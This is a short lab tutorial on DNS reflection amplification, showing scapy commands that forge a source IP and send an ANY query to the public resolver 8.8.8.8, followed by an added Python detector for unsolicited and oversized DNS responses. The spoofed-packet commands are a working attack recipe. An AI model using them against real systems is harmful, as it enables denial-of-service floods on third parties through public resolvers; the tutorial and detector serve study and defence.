cyber-security

DNS Reflection Amplification Attack

Prepare two machines

172.28.6.132 sends the packets, forging the source IP of the .133 machine
172.28.6.133 receives the packets

Constructing the IP packet

Use the scapy tool to construct the IP packet.
The construction process is as follows:


$ sudo scapy
>>> i=IP()
>>> i.src="172.28.6.133"
>>> i.dst="8.8.8.8"
>>> u=UDP()
>>> d=DNS()
>>> d.qdcount=1
>>> dr=DNSQR()
>>> dr.qname="baidu.com"
>>> dr.qtype=255
>>> d.qd=dr
>>> r=(i/u/d)
>>> r.display()
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1
  flags     =
  frag      = 0
  ttl       = 64
  proto     = udp
  chksum    = None
  src       = 172.28.6.133
  dst       = 8.8.8.8
  \options   \
###[ UDP ]###
     sport     = domain
     dport     = domain
     len       = None
     chksum    = None
###[ DNS ]###
        id        = 0
        qr        = 0
        opcode    = QUERY
        aa        = 0
        tc        = 0
        rd        = 1
        ra        = 0
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 0
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]###
         |  qname     = 'baidu.com'
         |  qtype     = ALL
         |  qclass    = IN
        an        = None
        ns        = None
        ar        = None
>>> sr1(r)  # send the packet

Packet capture shows

  1. Sending machine

  2. Receiving machine

Summary

As shown above, UDP makes it trivial to forge the source IP, which in turn lets weaknesses in certain applications and protocols be used for amplification. For example, the 69-byte packet sent above arrives at the target machine as a 529-byte packet, an amplification of more than 7x.
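How a defender can recognise this pattern in DNS traffic, as an added example that is not part of the original page: the packet records are constructed, the 69-byte and 529-byte sizes and the addresses are taken from the text, and the two vantage points (near the resolver, at the victim) are an assumption about where a sensor sits.

```python
from dataclasses import dataclass

QTYPE_ANY = 255  # the qtype the page's scapy query uses

@dataclass(frozen=True)
class DnsPacket:
    src: str
    dst: str
    txid: int
    is_response: bool
    qtype: int
    size: int  # bytes on the wire

def analyze(packets, ratio_threshold=5.0):
    """Return (unsolicited, amplified).

    unsolicited: responses with no matching query (same resolver, client, txid)
    seen earlier. A sensor in front of the victim sees exactly this during a
    reflection attack, because the forged queries were sent from elsewhere.
    amplified: matched query/response pairs whose size ratio reaches the
    threshold or whose query type is ANY; a sensor near the resolver sees these.
    """
    pending = {}
    unsolicited, amplified = [], []
    for p in packets:
        if not p.is_response:
            pending[(p.dst, p.src, p.txid)] = p
            continue
        q = pending.pop((p.src, p.dst, p.txid), None)
        if q is None:
            unsolicited.append(p)
            continue
        ratio = p.size / q.size
        if ratio >= ratio_threshold or q.qtype == QTYPE_ANY:
            amplified.append((q, p, round(ratio, 2)))
    return unsolicited, amplified

# Constructed sample traffic near the resolver: the page's 69-byte ANY query
# (source forged as .133), its 529-byte answer, and an ordinary A lookup.
NEAR_RESOLVER = [
    DnsPacket("172.28.6.133", "8.8.8.8", 0, False, QTYPE_ANY, 69),
    DnsPacket("8.8.8.8", "172.28.6.133", 0, True, QTYPE_ANY, 529),
    DnsPacket("172.28.6.10", "8.8.8.8", 7, False, 1, 60),
    DnsPacket("8.8.8.8", "172.28.6.10", 7, True, 1, 76),
]
# Constructed sample at the victim (.133): only reflected answers arrive.
AT_VICTIM = [
    DnsPacket("8.8.8.8", "172.28.6.133", 0, True, QTYPE_ANY, 529),
    DnsPacket("8.8.8.8", "172.28.6.133", 1, True, QTYPE_ANY, 529),
]
```

On the resolver-side sample the ANY pair is reported with a ratio of 7.67, while at the victim both answers are reported as unsolicited.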